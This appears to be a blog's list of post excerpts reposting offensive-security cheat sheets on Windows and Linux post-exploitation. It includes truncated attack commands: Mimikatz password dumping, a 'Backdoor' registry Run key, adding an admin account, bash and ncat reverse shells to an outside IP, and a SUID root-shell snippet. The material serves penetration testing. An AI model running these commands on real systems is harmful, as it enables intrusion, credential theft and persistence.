Summary: http://repository.root-me.org/Administration/Unix/EN%20-%20Dangers%20of%20SUID%20Shell%20Scripts.pdf Read more
posted @ 2019-02-21 12:05 heycomputer Views(96) Comments(0) Recommended(0)
Summary: Windows - Mimikatz Mimikatz - Execute commands Only one command PS C:\temp\mimikatz> .\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit Mim Read more
posted @ 2019-02-21 11:42 heycomputer Views(4734) Comments(0) Recommended(0)
Summary: Userland Registry Create a REG_SZ value in the Run key within HKCU\Software\Microsoft\Windows. Value name: Backdoor Value data: C:\Users\Rasta\AppData Read more
posted @ 2019-02-21 11:41 heycomputer Views(190) Comments(0) Recommended(0)
Summary: Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. Installation git clone https:/ Read more
posted @ 2019-02-21 11:40 heycomputer Views(564) Comments(0) Recommended(0)
Summary: Tools Watson - Watson is a (.NET 2.0 compliant) C# implementation of Sherlock (Deprecated) Sherlock - PowerShell script to quickly find missing softwa Read more
posted @ 2019-02-21 11:39 heycomputer Views(2275) Comments(0) Recommended(0)
Summary: TIP 1 - Create your credential :D net user hacker hacker /add net localgroup administrators hacker /add Some info about your user net user /dom net us Read more
posted @ 2019-02-21 11:38 heycomputer Views(1010) Comments(0) Recommended(0)
Summary: Downloaded files location C:\Users\<username>\AppData\Local\Microsoft\Windows\Temporary Internet Files\ C:\Users\<username>\AppData\Local\Microsoft\Wind Read more
posted @ 2019-02-21 11:35 heycomputer Views(341) Comments(0) Recommended(0)
Summary: Windows netsh Port Forwarding netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectp Read more
posted @ 2019-02-21 11:34 heycomputer Views(813) Comments(0) Recommended(0)
Summary: Netdiscover netdiscover -i eth0 -r 192.168.1.0/24 Currently scanning: Finished! | Screen View: Unique Hosts 20 Captured ARP Req/Rep packets, from 4 ho Read more
posted @ 2019-02-21 11:32 heycomputer Views(306) Comments(0) Recommended(0)
Summary: Reverse Shell Cheat Sheet Bash TCP bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 0<&196;exec 196<>/dev/tcp/<your IP>/<same unfiltered port>; sh <&196 >&196 2 Read more
posted @ 2019-02-21 11:31 heycomputer Views(1161) Comments(0) Recommended(0)
Summary: Summary Passive Recon Shodan Wayback Machine The Harvester Active Recon Nmap Nmap Script RPCClient Enum4all List all the subdirectories and files Gobu Read more
posted @ 2019-02-21 11:30 heycomputer Views(435) Comments(0) Recommended(0)
Summary: Installation curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall & Read more
posted @ 2019-02-21 11:28 heycomputer Views(565) Comments(0) Recommended(0)
Summary: Tools LinEnum - Scripted Local Linux Enumeration & Privilege Escalation Checks ./LinEnum.sh -s -k keyword -r report -e /tmp/ -t BeRoot - Privilege Esc Read more
posted @ 2019-02-21 11:26 heycomputer Views(505) Comments(0) Recommended(0)
Summary: Basic reverse shell ncat --udp -lvp 4242 ncat --sctp -lvp 4242 ncat --tcp -lvp 4242 Suid Binary TMPDIR2="/var/tmp" echo 'int main(void){setresuid(0, 0 Read more
posted @ 2019-02-21 11:25 heycomputer Views(311) Comments(0) Recommended(0)
Summary: https://github.com/swisskyrepo/PayloadsAllTheThings Methodology and Resources Active Directory Attack.md Linux - Persistence.md Linux - Privilege Esca Read more
posted @ 2019-02-21 11:22 heycomputer Views(386) Comments(0) Recommended(0)
Summary: Summary Tools Most common paths to AD compromise MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability) Open Shares GPO - Pivoting with Local Read more
posted @ 2019-02-21 11:20 heycomputer Views(1404) Comments(0) Recommended(0)
Summary: Summary Enumerate all subdomains Subbrute KnockPy GoogleDorks EyeWitness Sublist3r Subfinder Aquatone (Ruby and Go versions) AltDNS MassDNS Nmap Subdo Read more
posted @ 2019-02-21 11:18 heycomputer Views(2219) Comments(0) Recommended(0)